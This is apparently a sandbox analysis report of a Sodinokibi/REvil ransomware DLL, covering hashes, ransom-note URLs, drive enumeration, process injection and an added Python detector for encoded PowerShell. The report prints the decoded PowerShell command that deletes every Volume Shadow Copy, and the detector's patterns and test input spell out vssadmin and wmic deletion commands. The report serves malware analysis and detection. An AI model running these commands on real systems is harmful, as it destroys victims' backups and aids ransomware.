Analysis
max time kernel: 97s
max time network: 125s
platform: windows10-2004_x64
resource: win10v2004-20220721-en
resource tags: arch:x64, arch:x86, image:win10v2004-20220721-en, locale:en-us, os:windows10-2004-x64, system
submitted: 24-07-2022 21:15
Behavioral task behavioral1
  Sample: 5cb49636a0d759cf24bd19ce17003a62f1e8d4d076844b9110af8b9172413508.dll
  Resource: win7-20220718-en
Behavioral task behavioral2
  Sample: 5cb49636a0d759cf24bd19ce17003a62f1e8d4d076844b9110af8b9172413508.dll
  Resource: win10v2004-20220721-en
General
Target: 5cb49636a0d759cf24bd19ce17003a62f1e8d4d076844b9110af8b9172413508.dll
Size: 164KB
MD5: 853ab7bdeecf03306178f4af40eff694
SHA1: ff7b52e2ccf0b4b908af478cb477bc67bae61321
SHA256: 5cb49636a0d759cf24bd19ce17003a62f1e8d4d076844b9110af8b9172413508
SHA512: c9f1de2facf37a215ffe580024346a2a5873c2dcd378cf5226bf9631aeebd03a751f51331aa17bf046033d47bcd4309ed761d74fe4567eea0a95571bb5d5a1e6
Malware Config
Extracted from: C:\dl575844-readme.txt (ransom note)
Family: sodinokibi
URLs:
  http://aplebzu47wgazapdqks6vrcv6zcnjppkbxbr6wketf56nf6aq2nmyoyd.onion/B78A0E79F0ADECDD
  http://decryptor.top/B78A0E79F0ADECDD
Signatures
Sodin, Sodinokibi, REvil
  Ransomware with advanced anti-analysis and privilege escalation functionality.
Enumerates connected drives (3 TTPs, 24 IoCs)
  Attempts to read the root path of hard drives other than the default C: drive.
  Processes: rundll32.exe
  description              ioc     process
  File opened (read-only)  \??\B:  rundll32.exe
  File opened (read-only)  \??\F:  rundll32.exe
  File opened (read-only)  \??\H:  rundll32.exe
  File opened (read-only)  \??\M:  rundll32.exe
  File opened (read-only)  \??\S:  rundll32.exe
  File opened (read-only)  \??\W:  rundll32.exe
  File opened (read-only)  \??\A:  rundll32.exe
  File opened (read-only)  \??\O:  rundll32.exe
  File opened (read-only)  \??\Q:  rundll32.exe
  File opened (read-only)  \??\R:  rundll32.exe
  File opened (read-only)  \??\U:  rundll32.exe
  File opened (read-only)  \??\Y:  rundll32.exe
  File opened (read-only)  \??\K:  rundll32.exe
  File opened (read-only)  \??\G:  rundll32.exe
  File opened (read-only)  \??\I:  rundll32.exe
  File opened (read-only)  \??\L:  rundll32.exe
  File opened (read-only)  \??\N:  rundll32.exe
  File opened (read-only)  \??\E:  rundll32.exe
  File opened (read-only)  \??\P:  rundll32.exe
  File opened (read-only)  \??\T:  rundll32.exe
  File opened (read-only)  \??\V:  rundll32.exe
  File opened (read-only)  \??\X:  rundll32.exe
  File opened (read-only)  \??\Z:  rundll32.exe
  File opened (read-only)  \??\J:  rundll32.exe
Drops file in Program Files directory (6 IoCs)
  Processes: rundll32.exe
  description                   ioc                                              process
  File created                  \??\c:\program files (x86)\dl575844-readme.txt   rundll32.exe
  File opened for modification  \??\c:\program files\AddMeasure.emz              rundll32.exe
  File opened for modification  \??\c:\program files\AssertInvoke.ods            rundll32.exe
  File opened for modification  \??\c:\program files\BackupUnprotect.xht         rundll32.exe
  File opened for modification  \??\c:\program files\CompareRequest.mp3          rundll32.exe
  File created                  \??\c:\program files\dl575844-readme.txt         rundll32.exe
Suspicious behavior: EnumeratesProcesses (4 IoCs)
  Processes: rundll32.exe, powershell.exe
  pid   process
  4428  rundll32.exe
  4428  rundll32.exe
  4196  powershell.exe
  4196  powershell.exe
Suspicious use of AdjustPrivilegeToken (4 IoCs)
  Processes: powershell.exe, vssvc.exe
  description               pid   process
  Token: SeDebugPrivilege   4196  powershell.exe
  Token: SeBackupPrivilege  4344  vssvc.exe
  Token: SeRestorePrivilege 4344  vssvc.exe
  Token: SeAuditPrivilege   4344  vssvc.exe
Suspicious use of WriteProcessMemory (5 IoCs)
  Processes: rundll32.exe, rundll32.exe
  description                      pid   process       target process
  PID 3440 wrote to memory of 4428 3440  rundll32.exe  rundll32.exe
  PID 3440 wrote to memory of 4428 3440  rundll32.exe  rundll32.exe
  PID 3440 wrote to memory of 4428 3440  rundll32.exe  rundll32.exe
  PID 4428 wrote to memory of 4196 4428  rundll32.exe  powershell.exe
  PID 4428 wrote to memory of 4196 4428  rundll32.exe  powershell.exe
Processes
C:\Windows\system32\rundll32.exe (PID 3440, from the WriteProcessMemory IoCs above)
  Command line: rundll32.exe C:\Users\Admin\AppData\Local\Temp\5cb49636a0d759cf24bd19ce17003a62f1e8d4d076844b9110af8b9172413508.dll,#1
  - Suspicious use of WriteProcessMemory
  C:\Windows\SysWOW64\rundll32.exe (PID 4428, child of 3440; the DLL is 32-bit, so it runs under the WOW64 rundll32)
    Command line: rundll32.exe C:\Users\Admin\AppData\Local\Temp\5cb49636a0d759cf24bd19ce17003a62f1e8d4d076844b9110af8b9172413508.dll,#1
    - Enumerates connected drives
    - Drops file in Program Files directory
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of WriteProcessMemory
    C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe (PID 4196, child of 4428)
      Command line: powershell -e RwBlAHQALQBXAG0AaQBPAGIAagBlAGMAdAAgAFcAaQBuADMAMgBfAFMAaABhAGQAbwB3AGMAbwBwAHkAIAB8ACAARgBvAHIARQBhAGMAaAAtAE8AYgBqAGUAYwB0ACAAewAkAF8ALgBEAGUAbABlAHQAZQAoACkAOwB9AA==
      Decoded -e argument (base64 of UTF-16LE): Get-WmiObject Win32_Shadowcopy | ForEach-Object {$_.Delete();}
      This deletes every Volume Shadow Copy through WMI so that encrypted files cannot be rolled back. The vssvc.exe activity below (PID 4344 acquiring SeBackupPrivilege and SeRestorePrivilege) is consistent with the VSS service handling this request.
      - Suspicious behavior: EnumeratesProcesses
      - Suspicious use of AdjustPrivilegeToken
C:\Windows\system32\wbem\unsecapp.exe
  Command line: C:\Windows\system32\wbem\unsecapp.exe -Embedding
C:\Windows\system32\vssvc.exe (PID 4344)
  Command line: C:\Windows\system32\vssvc.exe
  - Suspicious use of AdjustPrivilegeToken
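The PID 4196 command line above hides the shadow-copy deletion behind an -EncodedCommand argument. The following Python script is an added triage helper, not part of the sandbox report or of the sample: it decodes the -e argument (any unambiguous prefix of -EncodedCommand, base64 over UTF-16LE) and checks the resulting script for shadow-copy deletion. The report's own command line is embedded as input; the benign command line and the vssadmin/wmic patterns are constructed additions to show the detector on inputs that the report does not contain.

```python
"""Decode PowerShell -EncodedCommand arguments and flag Volume Shadow Copy deletion."""
import base64
import re

# Command line copied from the sandbox process tree (PID 4196 in the report).
REPORT_CMDLINE = (
    "powershell -e "
    "RwBlAHQALQBXAG0AaQBPAGIAagBlAGMAdAAgAFcAaQBuADMAMgBfAFMAaABhAGQAbwB3AGMAbwBwAHkAIAB8ACAA"
    "RgBvAHIARQBhAGMAaAAtAE8AYgBqAGUAYwB0ACAAewAkAF8ALgBEAGUAbABlAHQAZQAoACkAOwB9AA=="
)

# Constructed benign line (not from the report) so the detector has a negative case.
BENIGN_CMDLINE = "powershell -e " + base64.b64encode("Get-Date".encode("utf-16-le")).decode()

SHADOW_DELETE_PATTERNS = [
    # The WMI form seen in this report: enumerate Win32_ShadowCopy and call Delete() on each.
    re.compile(r"win32_shadowcopy.*\.delete\(", re.I | re.S),
    # Common alternatives, assumed here for coverage; not observed in this run.
    re.compile(r"vssadmin(\.exe)?\s+delete\s+shadows", re.I),
    re.compile(r"wmic(\.exe)?\s+shadowcopy\s+delete", re.I),
]


def decode_encoded_command(cmdline: str):
    """Return the script carried by a `powershell -e <base64>` command line, or None.

    PowerShell accepts any prefix of -EncodedCommand that is not ambiguous with another
    parameter; '-e', '-ec' and '-enc' are the spellings seen in the wild. The payload is
    base64 of the UTF-16LE script text, so a byte count that is not even is invalid.
    """
    tokens = cmdline.split()
    for i, tok in enumerate(tokens[:-1]):
        flag = tok.lstrip("-/").lower()
        if not (flag.startswith("e") and "encodedcommand".startswith(flag)):
            continue  # skips -ExecutionPolicy and unrelated switches
        try:
            raw = base64.b64decode(tokens[i + 1], validate=True)
            return raw.decode("utf-16-le")
        except ValueError:  # binascii.Error and UnicodeDecodeError both derive from ValueError
            return None
    return None


def classify(cmdline: str) -> dict:
    """Decode the command line if it is encoded, then test it for shadow-copy deletion."""
    script = decode_encoded_command(cmdline)
    text = script if script is not None else cmdline
    hits = [p.pattern for p in SHADOW_DELETE_PATTERNS if p.search(text)]
    return {
        "encoded": script is not None,
        "script": text,
        "shadow_copy_deletion": bool(hits),
        "matched": hits,
    }


if __name__ == "__main__":
    for line in (REPORT_CMDLINE, BENIGN_CMDLINE, "vssadmin.exe delete shadows /all /quiet"):
        r = classify(line)
        print(f"encoded={r['encoded']} shadow_copy_deletion={r['shadow_copy_deletion']}: {r['script']}")
```

Run on its own the script prints the decoded REvil command, `Get-WmiObject Win32_Shadowcopy | ForEach-Object {$_.Delete();}`, flagged as shadow-copy deletion, while the constructed `Get-Date` line is decoded but not flagged. The same `classify` function can be pointed at Sysmon Event ID 1 or 4688 command-line fields; decoding before matching is what makes the difference, since the raw command line contains none of the keywords.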
Network
MITRE ATT&CK Matrix ATT&CK v6
Downloads
memory/4196-131-0x0000000000000000-mapping.dmp
memory/4196-132-0x000002364FD30000-0x000002364FD52000-memory.dmp (136KB)
memory/4196-133-0x00007FF867DE0000-0x00007FF8688A1000-memory.dmp (10.8MB)
memory/4196-134-0x00007FF867DE0000-0x00007FF8688A1000-memory.dmp (10.8MB)
memory/4428-130-0x0000000000000000-mapping.dmp